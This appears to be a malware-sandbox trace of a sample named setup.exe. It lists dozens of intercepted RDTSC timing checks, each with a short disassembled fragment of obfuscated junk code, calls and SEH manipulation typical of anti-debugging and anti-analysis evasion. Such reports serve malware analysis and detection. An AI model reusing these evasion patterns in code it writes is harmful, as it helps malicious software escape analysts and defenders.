                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 573C4A second address: 573C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 576F52 second address: 576FB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C8h 0x00000007 jmp 00007F808D4B80BDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F808D4B80C2h 0x00000014 jmp 00007F808D4B80C5h 0x00000019 jmp 00007F808D4B80BEh 0x0000001e popad 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57B5F5 second address: 57B5FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57B5FC second address: 57B627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007F808D4B80CBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e je 00007F808D4B80BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57B627 second address: 57B635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57B44F second address: 57B454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57B454 second address: 57B492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D280531h 0x00000009 jmp 00007F808D28052Ah 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a ja 00007F808D280526h 0x00000020 popad 0x00000021 jmp 00007F808D28052Ch 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57E18C second address: 57E1AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F808D4B80C3h 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57E1AB second address: 57E1CB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F808D280532h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F808D28052Ah 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58027F second address: 580285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5802D8 second address: 5802DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5802DE second address: 5802E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5802E3 second address: 5802F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D28052Dh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5802F4 second address: 580361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e jmp 00007F808D4B80BCh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop ebx 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F808D4B80BDh 0x00000020 mov eax, dword ptr [eax] 0x00000022 push edi 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F808D4B80C8h 0x0000002b popad 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jno 00007F808D4B80B8h 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 580361 second address: 580366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 580366 second address: 5803B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov di, ax 0x0000000d call 00007F808D4B80B9h 0x00000012 jng 00007F808D4B80BAh 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ebx 0x0000001c push eax 0x0000001d pushad 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push esi 0x00000022 pop esi 0x00000023 popad 0x00000024 jmp 00007F808D4B80C9h 0x00000029 popad 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5803B1 second address: 5803BF instructions: 0x00000000 rdtsc 0x00000002 je 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5803BF second address: 5803E4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jbe 00007F808D4B80BEh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop ebx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 580AEA second address: 580B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280537h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F808D28052Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5816A4 second address: 5816A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5816A9 second address: 5816BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D28052Fh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58457F second address: 5845A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C1h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e jp 00007F808D4B80B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58583B second address: 5858A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 je 00007F808D280526h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F808D28052Dh 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F808D280528h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 add edi, 7B6F6A26h 0x00000038 push 00000000h 0x0000003a jne 00007F808D280529h 0x00000040 push 00000000h 0x00000042 jmp 00007F808D280531h 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push esi 0x0000004d pop esi 0x0000004e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5858A2 second address: 5858A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5858A6 second address: 5858AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5879B6 second address: 587A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F808D4B80B8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 cmc 0x00000027 push 00000000h 0x00000029 mov si, cx 0x0000002c push 00000000h 0x0000002e xchg eax, ebx 0x0000002f jmp 00007F808D4B80BCh 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 push esi 0x00000039 pop esi 0x0000003a pop esi 0x0000003b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58D90E second address: 58D913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58D913 second address: 58D919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58E84A second address: 58E84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 590A68 second address: 590A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 590A6C second address: 590A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58CB8A second address: 58CC23 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F808D4B80BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F808D4B80BAh 0x00000010 nop 0x00000011 mov ebx, dword ptr [ebp+122D17ACh] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F808D4B80B8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 movsx ebx, ax 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 pushad 0x00000043 jmp 00007F808D4B80C0h 0x00000048 add ecx, dword ptr [ebp+122D29FBh] 0x0000004e popad 0x0000004f mov eax, dword ptr [ebp+122D0269h] 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007F808D4B80B8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f push FFFFFFFFh 0x00000071 mov dword ptr [ebp+122D1C17h], ebx 0x00000077 nop 0x00000078 pushad 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58CC23 second address: 58CC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58EAEA second address: 58EB06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58CC29 second address: 58CC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59289D second address: 5928A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 58CC31 second address: 58CC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5928A3 second address: 592911 instructions: 0x00000000 rdtsc 0x00000002 je 00007F808D4B80B8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D2DA5h], edx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F808D4B80B8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F808D4B80B8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d xor dword ptr [ebp+122D1E64h], eax 0x00000053 xchg eax, esi 0x00000054 jng 00007F808D4B80C2h 0x0000005a jbe 00007F808D4B80BCh 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 592911 second address: 592930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F808D280537h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5949A3 second address: 5949B0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D4B80B8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5949B0 second address: 5949D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F808D280532h 0x00000010 jnl 00007F808D280526h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5949D3 second address: 5949DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5949DD second address: 5949E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5949E3 second address: 5949FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C5h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53A15D second address: 53A16B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53A16B second address: 53A175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53A175 second address: 53A196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280535h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53A196 second address: 53A1E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F808D4B80B6h 0x00000010 jmp 00007F808D4B80C3h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 jmp 00007F808D4B80C4h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53A1E3 second address: 53A1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D28052Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53A1F3 second address: 53A1F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 595072 second address: 595078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59891B second address: 59891F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59891F second address: 59894B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov edi, 5DB3E461h 0x0000000d push 00000000h 0x0000000f mov bh, A7h 0x00000011 push 00000000h 0x00000013 jp 00007F808D28052Ah 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jne 00007F808D280526h 0x00000024 popad 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59B995 second address: 59B9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jg 00007F808D4B80B6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59B9AA second address: 59B9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59BF44 second address: 59BF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jc 00007F808D4B80B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59BF5B second address: 59BF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F808D28052Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59BF68 second address: 59BFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov ebx, dword ptr [ebp+122D2E25h] 0x0000000c mov bx, dx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F808D4B80B8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d xor ebx, dword ptr [ebp+122D25C4h] 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 jne 00007F808D4B80BCh 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 599AFA second address: 599AFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 599AFF second address: 599B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59CEFE second address: 59CF03 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 599B0D second address: 599B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F808D4B80B8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 sub dword ptr [ebp+122D19B2h], esi 0x00000027 or bl, 00000036h 0x0000002a push dword ptr fs:[00000000h] 0x00000031 sub dword ptr [ebp+124833B8h], esi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e and di, 7625h 0x00000043 mov eax, dword ptr [ebp+122D1039h] 0x00000049 sbb ebx, 521564A7h 0x0000004f push FFFFFFFFh 0x00000051 mov dword ptr [ebp+122D2B58h], edi 0x00000057 mov dword ptr [ebp+122D2C51h], ecx 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 jmp 00007F808D4B80BCh 0x00000066 pushad 0x00000067 popad 0x00000068 popad 0x00000069 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FDD2 second address: 59FDD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FDD6 second address: 59FDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FDDF second address: 59FDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FDE5 second address: 59FDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FDF0 second address: 59FDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FDF6 second address: 59FE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F808D4B80B8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 and bx, B5C8h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007F808D4B80B8h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 jng 00007F808D4B80BBh 0x00000048 mov ebx, 0C878644h 0x0000004d mov ebx, dword ptr [ebp+122D2867h] 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FE60 second address: 59FE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FF8E second address: 59FF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FF92 second address: 59FF96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FF96 second address: 59FFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F808D4B80BCh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59FFAC second address: 59FFB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
